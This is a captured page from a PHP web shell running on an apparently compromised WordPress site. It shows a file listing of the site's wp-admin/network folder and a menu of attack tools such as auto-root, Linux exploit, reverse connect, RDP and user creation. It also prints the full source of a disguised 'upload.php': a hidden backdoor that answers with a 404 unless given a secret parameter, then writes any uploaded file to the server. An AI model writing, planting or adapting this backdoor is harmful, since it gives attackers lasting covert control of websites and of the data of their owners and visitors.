FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 3.145.100.144
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-admin /
network /
[ HOME SHELL ]
Name
Size
Permission
Action
about.php
245
B
-rw-r--r--
admin.php
1
KB
-rw-r--r--
contribute.php
255
B
-rw-r--r--
credits.php
249
B
-rw-r--r--
edit.php
908
B
-rw-r--r--
freedoms.php
251
B
-rw-r--r--
indec.php
13.63
KB
-rw-r--r--
index.php
2.84
KB
-rw-r--r--
install.php
18.03
KB
-r--r--r--
lo.php
7.82
KB
-rw-r--r--
luuf.php
52.9
KB
-rw-r--r--
menu.php
4.63
KB
-rw-r--r--
plugin-editor.php
266
B
-rw-r--r--
plugin-install.php
377
B
-rw-r--r--
plugins.php
249
B
-rw-r--r--
privacy.php
249
B
-rw-r--r--
profile.php
254
B
-rw-r--r--
settings.php
21.46
KB
-rw-r--r--
setup.php
247
B
-rw-r--r--
site-info.php
7.59
KB
-rw-r--r--
site-new.php
9.35
KB
-rw-r--r--
site-settings.php
5.49
KB
-rw-r--r--
site-themes.php
6.71
KB
-rw-r--r--
site-users.php
10.82
KB
-rw-r--r--
sites.php
13.26
KB
-rw-r--r--
theme-editor.php
264
B
-rw-r--r--
theme-install.php
374
B
-rw-r--r--
themes.php
15.62
KB
-rw-r--r--
update-core.php
253
B
-rw-r--r--
update.php
450
B
-rw-r--r--
upgrade.php
4.85
KB
-rw-r--r--
upload.php
2.49
KB
-r--r--r--
user-edit.php
253
B
-rw-r--r--
user-new.php
5.12
KB
-rw-r--r--
users.php
9.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload.php
<?php //error_reporting(0); http_response_code(404); if (isset($_GET["p"])) { $p = $_GET["p"]; $p_m = md5($p); if($p_m != 'bc7df2c662de81b0273bb3afcf250127'){ return http_response_code(404); } } else { return http_response_code(404); } function a($msg, $sts = 1, $loc = "") { global $p; $status = (($sts == 1) ? "success" : "error"); echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".$p."\"}})</script>"; } ?> <!doctype html> <!-- RandsX aka T1kus_g0t --> <html lang="en"> <head> <meta name="theme-color" content="red"> <meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"> <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <title>Wordpress Upload</title> <style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style> <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script> </head> <body style="background-color:#000;color:#fff;font-family:serif;"> <div class="bg-dark table-responsive text-light border"> <div class="d-flex justify-content-between p-1"> <div><h3 class="mt-2"><a href="?">Wordpress Upload</a></h3></div> </div> <div class="border-top table-responsive"> <li>Server : <?= "{$_SERVER["SERVER_NAME"]} ({$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]})" ?></li> </div> <form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form> </div> <?php if ($_FILES["f"]["error"][0] > 0) { echo "error:" . $_FILES["f"]["error"][0] . "<br>"; } if (isset($_FILES["f"]['name'][0])) { move_uploaded_file($_FILES["f"]["tmp_name"][0], __DIR__.'/' . $_FILES["f"]["name"][0]); if (file_exists(__DIR__.'/' . $_FILES["file"]["name"][0])) { a("folder deleted successfully"); } else { a("failed to delete the folder", 0); } } ?> </body> </html>
Close